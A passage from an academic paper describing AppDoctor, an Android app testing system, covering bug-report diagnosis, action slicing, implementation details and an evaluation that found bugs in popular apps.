#### 5.3 Diagnosis

The bug reports detected by AppDoctor's exploration are not always true bugs because the effects of actions in approximate mode are not always reproduced by the same actions in faithful mode. Manually inspecting all bug reports would be labor-intensive and error-prone, raising challenges for time- and resource-constrained app developers. Fortunately, AppDoctor automatically classifies bug reports for the developers using the algorithm shown in Figure 4, which reduced the number of reports developers need to inspect by 13.6× in our evaluation (§8.4).

This algorithm takes an action trace from a bug report, and classifies the report into four types: (1) verified bugs (real bugs reproducible on clean devices), (2) pruned false positives, (3) likely bugs, and (4) likely false positives. Types 1 and 2 need no further manual inspection to classify (for verified bugs, developers still have to pinpoint the code responsible for the bug and patch it). The more reports AppDoctor places in these two types, the more effective it is. Types 3 and 4 need some manual inspection, and AppDoctor's detailed action traces and suggested report types help reduce inspection effort.

As shown in the algorithm, AppDoctor automatically diagnoses a bug report in three steps. First, it does a quick filtering to prune false positives caused by Android emulator/OS/environment problems. Specifically, it replays the trace in approximate mode, checking whether the same failure occurs.
If the failure disappears, then the report is most likely caused by problems in the environment, such as bugs in the Android emulator (which we did encounter in our experiments) or temporary problems in remote servers. AppDoctor prunes these reports as FPs.

Second, it automatically verifies bugs. Specifically, it simplifies the trace using the action slicing technique described in the next section, and replays the trace in faithful mode. If the same failure appears, then the trace almost always corresponds to a real bug. AppDoctor generates a MonkeyRunner testcase, and verifies the bug using clean devices independent of AppDoctor. If it can reproduce the failure, it classifies the report as a verified bug. The testcase can be sent directly to developers for reproducing and diagnosing the bug. If MonkeyRunner cannot reproduce the failure, then the failure is most likely caused by the difference in how AppDoctor and MonkeyRunner wait for an action to finish. Thus, AppDoctor classifies the report as a likely bug, so developers can inspect the trace and modify the timing of the events in the MonkeyRunner testcase to verify the bug.

Third, AppDoctor automatically prunes FPs. At this point, the trace can be replayed in approximate mode, but not in faithful mode. If AppDoctor can pinpoint the action that causes this divergence, it can confirm that the report is an FP. Specifically, for each action in the trace (action1 in Figure 4), AppDoctor replays the trace in mixed mode: this action in faithful mode and all other actions in approximate mode. If the failure disappears, AppDoctor has found the culprit of the divergence, and classifies the report as a pruned FP. If AppDoctor cannot find such an action, it classifies the report as a likely FP for further inspection.

### 6. Action Slicing

AppDoctor uses action slicing to remove unnecessary actions from a trace before determining whether the trace is a bug or an FP (slice in Figure 4). This technique brings two benefits.
First, by shortening the trace, it also shortens the final testcase (if the report is a bug), reducing developer diagnosis effort. Second, a shorter trace also speeds up replay.

Slicing techniques [30, 54] have been shown to effectively shorten an instruction trace by removing instructions irrelevant to reaching a target instruction. However, these techniques all hinge on a clear specification of the dependencies between instructions, which AppDoctor does not have for the actions in its traces. Thus, it appears that AppDoctor could only use slow approaches such as attempting to remove actions one subset at a time to shorten the trace.

Our insight is that, because AppDoctor already provides an effective way to validate traces, it can embrace approximation in slicing as well. Specifically, given a trace, AppDoctor applies a fast slicing algorithm that computes a minimal slice assuming minimal, approximate dependencies between actions. It validates whether this slice can reproduce the failure. If so, it returns this slice immediately. Otherwise, it applies a slower algorithm to compute a more accurate slice.

Figure 5 shows the fast slicing algorithm. It takes a trace and returns a slice of the trace containing the actions necessary to reproduce the failure. It starts by putting the last action of the trace into the slice because the last action is usually necessary to cause the failure. It then iterates through the trace in reverse order, adding any action that the actions in the slice approximately depend on.

```java
appdoctor.fast_slice(trace) {
    slice = {last action of trace};
    for (action in reverse(trace))
        if (action in slice)
            slice.add(get_approx_depend(action, trace));
    return slice;
}

get_approx_depend(action, trace) {
    for (action2 in trace) {
        if (action is enabled by action2)
            return action2;
        if (action is always available && action2.state == action.state)
            return action2;
    }
}
```
Figure 5: Fast slicing algorithm to remove actions from a trace.

Figure 6: Type 1 action dependency. $S_i$ represents app states, and $a_i$ represents actions. Bold solid lines are the actions in the trace, thin solid lines the other actions available at a given state, and dotted lines the action dependency. $a_4$ depends on $a_2$ because $a_2$ enables $a_4$.

Figure 7: Type 2 action dependency. $a_3$ depends on $a_2$ because $a_3$ is performed in $S_2$, and $a_2$ is the action that first leads to $S_2$.

The key to this algorithm is get_approx_depend, which computes approximate action dependencies. It leverages an approximate notion of an activity's state. Specifically, this state includes each widget's type, position, and content, and the parent-child relationship between the widgets. It also includes the data the activity saves when it is switched to the background. To obtain this data, AppDoctor calls the activity's onPause, onSaveInstanceState, and onResume handlers. This state is approximate because the activity may hold additional data in other places such as files.

Function get_approx_depend considers only two types of dependencies. First, if an action becomes available at some point, AppDoctor considers this action dependent on the action that enables it. For instance, suppose a Click action is performed on a button and the app displays a new activity. We say that the Click enables all actions of the new activity and is depended upon by these actions. Another example is shown in Figure 6: action $a_4$ becomes available after action $a_2$ is performed, so AppDoctor considers $a_4$ dependent on $a_2$. Second, if an action is always available (e.g., a user can always press the Menu key regardless of which activity is in the foreground) and is performed in some state $S_2$, then it depends on the action that first creates the state $S_2$ (Figure 7). For instance, suppose a user performs a sequence of actions ending with action $a_2$, causing the app to enter state $S_2$ for the first time.
She then performs more actions, causing the app to return to state $S_2$, and performs action $a_3$, "press the Menu key." get_approx_depend considers that action $a_3$ depends on action $a_2$. The intuition is that the effect of an always-available action usually depends on the current app state, and this state depends on the action that leads the app to this state.

When the slice computed by fast slicing cannot reproduce the failure, AppDoctor tries a slower slicing algorithm that removes cycles from the trace, where a cycle is a sequence of actions that starts and ends at the same state. For instance, Figure 7 contains a cycle ($S_2 \rightarrow S_3 \rightarrow S_2$). If a sequence of actions does not change the app state, discarding it should not affect the reproducibility of the bug. If the slower algorithm also fails, AppDoctor falls back to the slowest approach: it iterates through all actions in the trace, trying to remove them one subset at a time.

Our results show that fast slicing works very well. It worked for 43 out of 61 traces. The slower version worked for 10 more. Only 8 needed the slowest version. Moreover, slicing reduced the mean trace length from 38.71 to 10.03, making diagnosis much easier.

### 7. Implementation

AppDoctor runs on a cluster of Android devices or emulators. Figure 8 shows the architecture. A controller monitors multiple agents and, when some agents become idle, commands these agents to start checking sessions based on developer configurations. The agents can run on the same machine as the controller or across a cluster of machines, enabling AppDoctor to scale. Each agent connects to a device or an emulator via the Android Debug Bridge [2]. The agent installs on the device or emulator the target app to check and an instrumentation app for collecting and performing actions. It then starts and connects to the instrumentation app, which in turn starts the target app.
The agent then explores possible executions of the target app by receiving the list of available actions from the instrumentation app and sending commands to the instrumentation app to perform actions on the target app. The agent runs in a separate process outside of the emulator or the device for robustness: it tolerates many types of failures, including Android system failures and emulator crashes. Furthermore, running separately enables the system to keep information between checking executions, so AppDoctor can explore a different execution than previously explored (§7.4). The controller contains 188 lines of Python code. The agent contains 3701 lines of Python code. The instrumentation app contains 7259 lines of Java code. The remainder of this section discusses AppDoctor’s implementation details. 7.1 Instrumentation App To test an app, AppDoctor needs to monitor the app’s state, collect available actions from the app, and perform actions on the app. The Android instrumentation framework [3] provides interfaces for monitoring events delivered to an app and injecting events into the app. We built the instrumentation app using this framework. It runs in the same process as the target app for collecting and performing actions. It also leverages Java’s reflection mechanism to collect other information from the target app that the Android instrumentation framework cannot collect. Specifically, it uses reflection to get the list of widgets of an activity and to directly invoke an app’s event handlers even if they are private or protected Java methods. The instrumentation app enables developers to write app-specific checkers, which we leave for future work. 7.2 App Repacking and Signing For security purposes, Android requires that the instrumentation app and the target app be signed by the same key. To work around this restriction, AppDoctor unpacks the target app and then repacks and signs the app using its own key.
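The repack-and-sign workaround could be scripted roughly like this. The tool invocations (apktool for unpacking and repacking, jarsigner for signing) match the tools the paper names, but the exact flags, paths, and keystore details are illustrative assumptions, not AppDoctor’s real pipeline:

```python
def repack_commands(apk, workdir, out_apk, keystore, alias):
    """Build the shell commands for an AppDoctor-style repack-and-sign.

    A sketch only: the real pipeline also edits AndroidManifest.xml in
    `workdir` (e.g., to add the network permission) before rebuilding.
    """
    return [
        ["apktool", "d", apk, "-o", workdir, "-f"],            # unpack
        ["apktool", "b", workdir, "-o", out_apk],              # repack
        ["jarsigner", "-keystore", keystore, out_apk, alias],  # re-sign
    ]
```

Each command list could then be run with `subprocess.run`, aborting the checking session if any step fails.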
Furthermore, since AppDoctor needs to communicate with the instrumentation app through socket connections, it uses ApkTool [12] to add network permission to the target app. 7.3 Optimizations We implemented two optimizations in AppDoctor to further speed up the testing process. First, AppDoctor pre-generates a repository of cleanly booted emulator snapshots, one per configuration (e.g., screen size and density). When checking an app, AppDoctor simply starts from the specific snapshot instead of booting an emulator from scratch, which can take 5 minutes. Second, to check multiple executions of an app, AppDoctor reuses the same emulator instance without starting a new one. To reset the app’s initial state (§5.2), it simply kills the app process and wipes its data. These two optimizations minimize the preparation overhead and ensure that AppDoctor spends most of the time checking apps. 7.4 Exploration Methods Recall that when AppDoctor explores possible executions of an app, it can choose the next action to explore using different methods (Figure 3). It currently supports four methods: interactive, scripted, random, and systematic. With the interactive method, AppDoctor shows the list of available actions to the developer and lets her decide which one to perform, so she has total control of the exploration process. This method is most suitable for diagnosing bugs. With the scripted method, developers write scripts to select actions, and AppDoctor runs these test scripts. This method is most suitable for regression and functional testing. With the random method, AppDoctor randomly selects an action to perform. This method is most suitable for automatic testing. With the systematic method, AppDoctor systematically enumerates the actions in search of bugs using several search heuristics, including breadth-first search, depth-first search, and developer-written heuristics. This method is most suitable for model checking [21, 26, 32, 41, 44, 51, 52].
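The random and systematic methods can be viewed as interchangeable action-selection policies plugged into the same exploration loop. A minimal sketch, with hypothetical function names and an `explored` set of (state, action) pairs standing in for AppDoctor’s actual bookkeeping:

```python
import random


def random_policy(rng):
    """The 'random' method of §7.4: pick any available action."""
    def choose(state, actions, explored):
        return rng.choice(actions)
    return choose


def systematic_bfs_policy():
    """A breadth-first flavor of the 'systematic' method: prefer an
    action not yet explored from this state; otherwise fall back to
    the first action to keep the execution moving."""
    def choose(state, actions, explored):
        for a in actions:
            if (state, a) not in explored:
                return a
        return actions[0]
    return choose
```

After each step, the driver would add the chosen (state, action) pair to `explored`, so later executions favor untried actions.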
7.5 Waiting for Actions to Finish Recall that AppDoctor performs actions on the target app as soon as the previous action is done. It detects when the app is done with an action using the Android instrumentation framework’s waitForIdle function, which returns when the main thread—the thread for processing all GUI events—is idle. Two apps, Twitter and ESPN, sometimes keep the main thread busy (e.g., during the login activity of Twitter), so AppDoctor falls back to waiting for a fixed length of time (3 seconds). Apps may also run asynchronous tasks in the background using Android’s AsyncTask Java class, so even if their main threads are idle, the overall event processing may still be running. AppDoctor solves this problem by intercepting asynchronous tasks and waiting for them to finish. Specifically, AppDoctor uses reflection to replace AsyncTask with its own implementation, which monitors all background tasks and waits for them to finish. 7.6 Input Generation Apps often require inputs to move from one activity to another. For instance, an app may ask for an email address or user name. AppDoctor has a component that generates proper inputs to improve coverage. It focuses on text boxes because they are the most common way for apps to get text from users. Android has a feature that simplifies AppDoctor’s input generation: Android allows developers to specify the type of a text box (e.g., email addresses or integers), so that when a user starts typing, Android can display a keyboard customized for that type of text. Leveraging this feature, AppDoctor automatically fills many text boxes with text from a database we pre-generated, which includes email addresses, numbers, etc. To further help developers test apps, AppDoctor allows developers to specify input generation rules in the form of “widget-name:pattern-of-text-to-fill.” In our experiments, the most common use of this mechanism is to specify login credentials.
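The rule-plus-database lookup for filling text boxes might look roughly like this; the `TEXT_DB` contents, the function name, and the exact rule syntax handling are illustrative assumptions:

```python
import random

# Hypothetical pre-generated sample database, keyed by the text box's
# declared input type (cf. Android's input-type hints).
TEXT_DB = {
    "email": ["[email protected]", "[email protected]"],
    "number": ["0", "42", "-1"],
    "text": ["hello", ""],
}


def fill_text_box(widget_name, input_type, rules, rng=random.Random(0)):
    """Pick text for a text box: a developer rule of the form
    'widget-name:text-to-fill' wins; otherwise fall back to the
    pre-generated database entry for the box's declared input type."""
    for rule in rules:
        name, _, text = rule.partition(":")
        if name == widget_name:
            return text
    return rng.choice(TEXT_DB.get(input_type, TEXT_DB["text"]))
```

With a rule such as `"login_user:alice"`, the login box always receives the supplied credential, while unconstrained boxes draw from the database.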
Other than text boxes, developers may also specify rules to generate inputs for other actions, including the value set by SetNumberPicker, the item selected by ListSelect, and the position set by MoveSeekBar. By default, AppDoctor generates random inputs for these three actions. Note that AppDoctor could leverage symbolic execution [14, 22] to generate inputs that exercise tricky code paths within apps, which we intend to explore in future work. However, our current mechanisms suffice to detect many bugs because, in our experience, apps treat many input texts as “black boxes,” simply storing and displaying the texts without actually using them in any fancy way. 7.7 Replay and Nondeterminism Recall that, at various stages, AppDoctor replays a trace to verify whether the trace can reproduce the corresponding failure. This replay is subject to the nondeterminism in the target app and environment. A plethora of work has been done on deterministic record-replay [20, 27, 34, 43]. Although AppDoctor can readily leverage any of these techniques, we have not yet ported them to AppDoctor. For simplicity, we implemented a best-effort replay technique and replayed every trace 20 times. 7.8 Removing Redundant Reports One bug may manifest multiple times during exploration, causing many redundant bug reports. After collecting reports from all servers, AppDoctor filters redundant reports based mainly on the type of the failure and the stack trace, and keeps five reports per bug. 7.9 Extracting App Information AppDoctor uses ApkTool [12] to unpack the target app for analysis. It processes AndroidManifest.xml to find necessary information, including the target app’s identifier, startup activity, and library dependencies. It then uses this information to start the target app on configurations with the required libraries.
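Pulling this information out of an apktool-decoded manifest is straightforward with a standard XML parser. A sketch, assuming the manifest has already been decoded to plain-text XML (inside the APK it is stored in a binary XML format, which this code does not handle):

```python
import xml.etree.ElementTree as ET

# Attributes like android:name are namespaced in the manifest.
ANDROID_NS = "{http://schemas.android.com/apk/res/android}"


def parse_manifest(source):
    """Extract the app identifier, launcher activity, and <uses-library>
    dependencies from a decoded AndroidManifest.xml (path or file)."""
    root = ET.parse(source).getroot()
    info = {
        "package": root.get("package"),
        "main_activity": None,
        "libraries": [n.get(ANDROID_NS + "name")
                      for n in root.iter("uses-library")],
    }
    for activity in root.iter("activity"):
        for action in activity.iter("action"):
            if action.get(ANDROID_NS + "name") == "android.intent.action.MAIN":
                info["main_activity"] = activity.get(ANDROID_NS + "name")
    return info
```

The startup activity is the one whose intent filter declares the MAIN action; the package attribute gives the app identifier used to install and launch it.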
AppDoctor analyzes resource files to get the symbolic names corresponding to each widget, enabling developers to refer to widgets by symbolic names in their testing scripts (§7.4) and input generation rules (§7.6). 8. Evaluation We evaluated AppDoctor on a total of 64 popular apps from Google Play, including 53 closed-source apps and 11 open-source ones, listed in §8.1. We selected the closed-source apps as follows. We started from the top 100 popular apps in Nov 2012, then excluded 31 games that use custom GUI widgets written from scratch, which AppDoctor does not currently handle; 3 apps that require bank accounts or paid memberships; 2 libraries that do not run alone; 8 apps with miscellaneous dependencies, such as requiring text-message authentication; and 3 apps that do not work with the Android instrumentation framework. We selected the 11 open-source apps also based on popularity. Their source code simplifies inspecting the causes of the bugs detected. We picked the most popular apps because they are well tested, making them a solid benchmark of AppDoctor’s bug detection capability. We ran several quick checking sessions on these apps. Each session ran for roughly one day and had 165,000 executions, 2,500 per app. These executions were run on a cluster of 14 Intel Xeon servers. Each execution ran until 100 actions were reached or the app exited. Each session detected a slightly different set of bugs because checking executions used heuristics. Except for §8.1, which reports cumulative bug results over all sessions, all other subsections report results from the latest session. The rest of this section focuses on four questions: §8.1: Can AppDoctor effectively detect bugs? §8.2: Can AppDoctor achieve reasonable coverage? §8.3: Can AppDoctor greatly speed up testing? §8.4: Can AppDoctor reduce diagnosis effort? 8.1 Bugs Detected AppDoctor found a total of 72 bugs in 64 apps. Of these bugs, 67 are new and the other 5 were unknown to us but known to the developers.
We have reported 9 new bugs in the open-source apps to the developers, because these bugs are easier to diagnose with source code and the apps have public websites for reporting bugs. The developers have fixed two bugs and confirmed two more. Of the 5 bugs unknown to us but known to the developers, 4 were fixed in the latest version, and the other one had been reported by users but without event traces to reproduce it. Table 1 shows the bug count for each app we checked. We also show the number of users obtained from Google Play to indicate the popularity of the apps. The results show that AppDoctor can find bugs even in apps that have tens of millions of users and are built by reputable companies such as Google and Facebook. AppDoctor even found two bugs in the Android framework that affect all apps. AppDoctor found no bugs in 24 apps: WordSearch, Flixster, Adobe Reader, Brightest Flashlight, Ebay, Skype, Pinterest, Spotify, OI Shopping List, Daily Money, Dropbox, Midomi, Groupon, Speedtest, ColorNote, Voxer, RedBox, Lookout, Facebook Messenger, Devuni Flashlight, Go SMS, Wikipedia, Ultimate StopWatch, and Wells Fargo. We inspected all of the bugs found in the open-source apps to pinpoint their causes in the source code. Table 2 shows the details of these bugs. Most of the bugs are caused by accessing null references. The common reasons are that the developers forget to initialize references, access references that have been cleaned up, miss checks of null references, and fail to check certain assumptions about the environment. Most of these bugs can be triggered only under rare event sequences. We describe two interesting bugs. The first is Bug 11 in Table 2, a bug in the Android framework.
<table>
<thead>
<tr> <th>App</th> <th>Bugs</th> <th>Users (M)</th> <th>Open?</th> <th>Hints</th> </tr>
</thead>
<tbody>
<tr> <td>Android</td> <td>2</td> <td>n/a</td> <td></td> <td></td> </tr>
<tr> <td>Google Maps</td> <td>3</td> <td>500 ~ 1000</td> <td></td> <td></td> </tr>
<tr> <td>Facebook</td> <td>2</td> <td>500 ~ 1000</td> <td></td> <td>L, D</td> </tr>
<tr> <td>Pandora</td> <td>1</td> <td>100 ~ 500</td> <td></td> <td>L</td> </tr>
<tr> <td>Twitter</td> <td>1</td> <td>100 ~ 500</td> <td></td> <td>L</td> </tr>
<tr> <td>Google Translate</td> <td>3</td> <td>100 ~ 500</td> <td></td> <td>L</td> </tr>
<tr> <td>Shazam</td> <td>3</td> <td>100 ~ 500</td> <td></td> <td>L</td> </tr>
<tr> <td>Sgiggle</td> <td>2</td> <td>100 ~ 500</td> <td></td> <td>L</td> </tr>
<tr> <td>Advanced Task Killer</td> <td>1</td> <td>50 ~ 100</td> <td></td> <td>L</td> </tr>
<tr> <td>Barcode Scanner</td> <td>1</td> <td>50 ~ 100</td> <td></td> <td>L</td> </tr>
<tr> <td>Zedge</td> <td>1</td> <td>50 ~ 100</td> <td></td> <td>L</td> </tr>
<tr> <td>Amazon Kindle</td> <td>1</td> <td>50 ~ 100</td> <td></td> <td>L</td> </tr>
<tr> <td>Yahoo Mail</td> <td>3</td> <td>50 ~ 100</td> <td></td> <td>L</td> </tr>
<tr> <td>TuneIn Player</td> <td>1</td> <td>50 ~ 100</td> <td></td> <td>L</td> </tr>
<tr> <td>Walk Band</td> <td>2</td> <td>50 ~ 100</td> <td></td> <td>D</td> </tr>
<tr> <td>PhotoGrid</td> <td>1</td> <td>50 ~ 100</td> <td></td> <td>D</td> </tr>
<tr> <td>Kik Messenger</td> <td>3</td> <td>50 ~ 100</td> <td></td> <td>L</td> </tr>
<tr> <td>Logo Quiz</td> <td>2</td> <td>10 ~ 50</td> <td></td> <td>D</td> </tr>
<tr> <td>Zynga Words</td> <td>2</td> <td>10 ~ 50</td> <td></td> <td>D</td> </tr>
<tr> <td>Amazon</td> <td>2</td> <td>10 ~ 50</td> <td></td> <td>L</td> </tr>
<tr> <td>Mobile Bible</td> <td>3</td> <td>10 ~ 50</td> <td></td> <td>L</td> </tr>
<tr> <td>MyCalendar</td> <td>1</td> <td>10 ~ 50</td> <td></td> <td>L</td> </tr>
<tr> <td>Dictionary</td> <td>1</td> <td>10 ~ 50</td> <td></td> <td>L</td> </tr>
<tr> <td>GasBuddy</td> <td>1</td> <td>10 ~ 50</td> <td></td> <td>L</td> </tr>
<tr> <td>ooVoo</td> <td>1</td> <td>10 ~ 50</td> <td></td> <td>L</td> </tr>
<tr> <td>iHeartRadio</td> <td>1</td> <td>10 ~ 50</td> <td></td> <td>L</td> </tr>
<tr> <td>IMDB Mobile</td> <td>1</td> <td>10 ~ 50</td> <td></td> <td>L</td> </tr>
<tr> <td>ESPN Sports</td> <td>2</td> <td>10 ~ 50</td> <td></td> <td>L</td> </tr>
<tr> <td>Craigslist</td> <td>2</td> <td>10 ~ 50</td> <td></td> <td>L</td> </tr>
<tr> <td>TextGram</td> <td>1</td> <td>10 ~ 50</td> <td></td> <td>L</td> </tr>
<tr> <td>Google MyTracks</td> <td>2</td> <td>10 ~ 50</td> <td></td> <td>L</td> </tr>
<tr> <td>Terminal Emulator</td> <td>1</td> <td>10 ~ 50</td> <td></td> <td>L</td> </tr>
<tr> <td>Fandango</td> <td>2</td> <td>10 ~ 50</td> <td></td> <td>L, D</td> </tr>
<tr> <td>DoubleDown</td> <td>1</td> <td>5 ~ 10</td> <td></td> <td>L</td> </tr>
<tr> <td>OI FileManager</td> <td>2</td> <td>5 ~ 10</td> <td>Yes</td> <td>L</td> </tr>
<tr> <td>MP3 Ringtone Maker</td> <td>2</td> <td>1 ~ 5</td> <td></td> <td>L</td> </tr>
<tr> <td>BlackFriday</td> <td>6</td> <td>1 ~ 5</td> <td></td> <td>L</td> </tr>
<tr> <td>ACV Comic Viewer</td> <td>2</td> <td>1 ~ 5</td> <td>Yes</td> <td>L</td> </tr>
<tr> <td>OpenSudoku</td> <td>1</td> <td>1 ~ 5</td> <td></td> <td>L</td> </tr>
<tr> <td>OI Notepad</td> <td>1</td> <td>0.1 ~ 0.5</td> <td>Yes</td> <td></td> </tr>
<tr> <td>OI Safe</td> <td>1</td> <td>0.1 ~ 0.5</td> <td>Yes</td> <td></td> </tr>
</tbody>
</table> Table 1: Each app’s bug count. The first row lists the bugs AppDoctor found in the Android framework, which affect almost all apps. The number of users is in millions. The “Open?” column indicates whether the app is open source. “Hints” lists additional information we added: “L” for login credentials (§7.6) and “D” for delays (§7.7).
<table>
<thead>
<tr> <th>App</th> <th>Bug Description</th> <th>Status</th> </tr>
</thead>
<tbody>
<tr> <td>1 Google MyTracks</td> <td>Pressing ‘Search’ button bypassed License dialog and environment check, causing a crash</td> <td>Fixed</td> </tr>
<tr> <td>2 OI File Manager</td> <td>Checked for NullPointerException in doInBackground() but missed it in onPostExecute()</td> <td>Fixed</td> </tr>
<tr> <td>3 Terminal Emulator</td> <td>Rare event sequence led to access of a discarded variable</td> <td>Confirmed</td> </tr>
<tr> <td>4 OI File Manager</td> <td>Rare event order led to use of an uninitialized variable</td> <td>Confirmed</td> </tr>
<tr> <td>5 ACV Comic Viewer</td> <td>Incorrect assumption of the presence of Google Services caused a crash</td> <td>Reported</td> </tr>
<tr> <td>6 ACV Comic Viewer</td> <td>Failed to check for the failure of opening a file due to lack of permission, causing a crash</td> <td>Reported</td> </tr>
<tr> <td>7 OI Notepad</td> <td>Failed to check for the availability of another application after rotation, though it checked before rotation</td> <td>Reported</td> </tr>
<tr> <td>8 OpenSudoku</td> <td>Failed to check for the failure of loading a game, which was caused by the deletion of the game</td> <td>Reported</td> </tr>
<tr> <td>9 OI Safe</td> <td>Rare event sequence led to access of a discarded variable</td> <td>Reported</td> </tr>
<tr> <td>10 Google MyTracks</td> <td>Dismissed a dialog which had been removed from the screen due to lifecycle events</td> <td>Known</td> </tr>
<tr> <td>11 Android</td> <td>Rare event order led to a failed check in Android code</td> <td>Known</td> </tr>
</tbody>
</table> Table 2: All bugs found in open-source apps. We list one Android framework bug (Bug 11) because AppDoctor found this bug when testing OpenSudoku and Wikipedia. The bug was reported by others, but the report contained no event traces causing the bug. Figure 9: Activity coverage on apps. Each bar represents an app.
AppDoctor was able to trigger this bug in six apps: OpenSudoku, Wikipedia, Yahoo Mail, Shazam, Facebook, and Pinterest. We counted this bug as one bug to avoid inflating our bug count. To trigger this bug in OpenSudoku, a user selects a difficulty level of the game, and presses the Back key of the phone quickly, which sometimes crashes the app. The cause is that when an app switches from one activity to another, many event handlers are called. In the common case, these event handlers are called one by one in order, which tends to be what developers test. However, in rare cases, another event handler, such as the handler of the Back key in OpenSudoku, may jump into the middle of this sequence while the app is in an intermediate state. If this handler refers to some part of the app state, the state may be inconsistent or already destroyed, causing a crash. This bug was reported to the Android bug site, but no event sequences were provided on how the bug might be triggered, and the bug is still open. We recently reported the event sequence to trigger this bug, and are waiting for the developers to reply. The second is a bug in Google Translate, the most popular language translation app on Android, closed source, and built by Google. This bug causes Google Translate to crash after a user presses the Search key on the phone at the wrong moment. When a user first installs and runs Google Translate, it pops up a license agreement dialog with an Accept and a Decline button. If she presses the Accept button, she enters the main screen of Google Translate. If she presses the Decline button, Google Translate exits and she cannot use the app. However, on Android 2.3, if the user presses the Search button, the dialog is dismissed, but Google Translate is left in a corrupted state, and almost always crashes after a few events regardless of what the user does. We inspected the crash logs and found that the crashes were caused by accessing uninitialized references, indicating a logic bug inside Google Translate.
This bug is specific to Android 2.3 and does not occur in Android 4.0 and 4.2. AppDoctor found a similar bug in Google MyTracks (Bug 1 in Table 2). Unlike the bug in Google Translate, this bug can be triggered in Android 2.3, 4.0, and 4.2. We reported it and, based on our report, the developers have fixed it and released a new version of the app. 8.2 Coverage We measured AppDoctor’s coverage from the latest 1-day checking session, using two metrics. First, we measured AppDoctor’s coverage of activities by recording the activities AppDoctor visited and comparing them with all the activities in the apps. We chose this metric because once AppDoctor reaches an activity, it can explore most actions of the activity. Figure 9 shows the results. With only 2,500 executions per app, AppDoctor covered 66% of the activities averaged over all apps tested, and 100% for four apps. To understand what caused AppDoctor to miss the other activities, we randomly sampled 12 apps and inspected their disassembled code. The four main reasons are: (1) dead code (Lookout, Facebook, Flixster, OI Shopping List); (2) hardware requirements (e.g., PandoraLink for linking mobile devices with cars) not present (Sgiggle, Pandora, Brightest Flashlight); (3) activities available only to developers or premium accounts (Lookout, Groupon, Flixster, Facebook Messenger, Photogrid, Fandango); and (4) activities available after a nondeterministic delay (Groupon, Midomi, Pandora). Second, we also evaluated AppDoctor’s false negatives by running it on six bugs in five open-source apps, including two bugs in KeePassDroid (a password management app) and one bug each in OI Shopping List, OI Notepad, OI Safe (another password management app), and OI File Manager. We picked these bugs because they are event-triggered bugs, which AppDoctor is designed to catch. AppDoctor found 5 out of the 6 bugs.
It missed one bug in KeePassDroid because it treated two different states as the same and pruned the executions that trigger the bug. 8.3 Speedup AppDoctor’s speedup comes from (1) running actions faster in approximate mode and (2) performing the next action as soon as the previous one finishes. Figure 10 shows the speedup caused by the two factors. For each of the 165,000 executions from the latest AppDoctor checking session, we measured the time it took to complete this execution in (a) approximate mode, (b) faithful mode, and (c) MonkeyRunner. The difference between (a) and (b) demonstrates the speedup from approximate execution. The difference between (a) and (c) demonstrates the speedup from both approximate execution and AppDoctor’s more efficient wait method. As shown in Figure 10, approximate execution yields a $6.0 \times$ speedup, and the efficient wait brings the speedup to $13.3 \times$. Since most executions do not trigger bugs, AppDoctor spends the majority of its time in approximate mode, so this result translates to at least a $13.3 \times$ speedup over MonkeyRunner; “at least” because MonkeyRunner blindly injects events whereas AppDoctor does so systematically. 8.4 Automatic Diagnosis We evaluated how AppDoctor helps diagnosis using the reports from the last checking session. We focus on: (1) how many reports AppDoctor can automatically verify; (2) for the reports AppDoctor cannot verify, whether they are FPs or bugs; (3) what causes FPs; and (4) how effective action slicing is at pruning irrelevant events. Figure 11 shows AppDoctor’s automatic diagnosis results based on the latest checking session, which reduced the number of bug reports to inspect from 64 to only 5, a $12.8 \times$ reduction. AppDoctor initially emitted 64 bug reports on the 64 apps in the latest session. Of these reports, it could replay 61 in approximate mode, and discarded the other 3 as false positives. It then simplified the 61 reports and managed to replay 47 in faithful mode.
Based on the 47 faithfully replayed reports, it generated MonkeyRunner testcases and automatically reproduced 43 bugs on clean devices, verifying that these 43 reports are real bugs. 4 MonkeyRunner testcases did not reproduce the bugs, so AppDoctor flagged them as needing manual inspection. Out of the 14 reports that could be replayed in approximate mode but not in faithful mode, AppDoctor automatically pruned 13 false positives. The remaining one it could not prune was due to a limitation in our current implementation of the faithful mode of ListSelect (§5.1). Selecting an item by injecting low-level events involves two steps: scrolling the list to make the item show up, and moving the focus to the selected item. We implemented the first step by injecting mouse events to scroll the list, but not the second step, because it requires external keyboard or trackball support, which we have not added. AppDoctor flagged this report as needing manual inspection. Thus, out of 64 reports, AppDoctor automatically classified 59, leaving only 5 for manual inspection. The 5 reports that need manual inspection contain 4 MonkeyRunner testcases and 1 report caused by ListSelect. We manually inspected the MonkeyRunner testcases and modified one line in each to change the timing of an event. The modified testcases verified the bugs on real phones. For the report caused by ListSelect, we manually reproduced it on real phones. Thus, all 5 of these reports are real bugs. The total number of bugs AppDoctor found in this session is $(43 + 5) = 48$, lower than 72, the total number of bugs over all sessions, because each session may find a slightly different set of bugs due to our search heuristics. AppDoctor automatically pruned 13 FPs in this session, demonstrating the benefit of faithful replay: 6 were caused by approximate long clicks, 5 by approximate configuration changes, and 2 by approximate text inputs. 9. Limitations Currently, AppDoctor supports system actions such as Stop, Start, and Relaunch, and common GUI actions such as Click and LongClick. Adding new standard actions is easy. AppDoctor does not support custom widgets developed from scratch, because these widgets receive generic events such as Click at \((x, y)\) and then use complex internal logic to determine the corresponding action. AppDoctor also does not support custom action handlers on custom widgets created from standard widgets. Its input generation is incomplete; symbolic execution [29] could help solve this problem. If an app talks to a remote server, AppDoctor does not control the server. AppDoctor’s replay is not fully deterministic, which may cause AppDoctor to consider a real bug a false positive and prune it out, but this problem can be addressed by previous work [20, 23, 49]. AppDoctor leverages Android instrumentation, which instruments only Java-like bytecode, so AppDoctor has no control over the native parts of apps. These limitations may cause AppDoctor to miss bugs. 10. Related Work To our knowledge, no prior systems combined approximate and faithful executions, systematically tested against lifecycle events, identified the problem of FPs caused by approximate executions, generated event testcases, or provided solutions to automatically classify most reports into bugs and FPs and to slice unnecessary actions from bug traces. Unlike static tools, AppDoctor executes the app code and generates inputs. As a result, AppDoctor can provide an automated script to reproduce the bug on real devices, which static tools cannot do. Moreover, AppDoctor automatically verifies the bugs it finds, so the verified bugs are not false positives and do not need manual inspection, unlike reports from static tools. Android apps are event-driven, and their control flow is hidden behind complex callbacks and inter-process calls.
